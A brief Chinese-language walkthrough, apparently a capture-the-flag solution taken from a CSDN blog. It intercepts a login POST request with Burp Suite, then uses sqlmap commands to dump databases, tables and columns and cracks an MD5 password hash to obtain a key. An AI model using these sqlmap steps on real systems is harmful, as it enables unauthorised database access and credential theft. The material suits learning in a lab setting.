任意输入用户名密码
开启burpsuite,设置代理,截断登陆POST请求的数据包
将数据包保存为txt文件,打开sqlmap
开始爆数据库,表,列,字段值,例如:sqlmap -r txt文件路径 --dbs;sqlmap -r txt文件路径 -D 数据库名 --tables;sqlmap -r txt文件路径 -D 数据库名 -T 表名 --columns …
爆出name值,password值用md5解密,输入用户名密码的到key
来源:https://blog.csdn.net/qq_36933272/article/details/100531825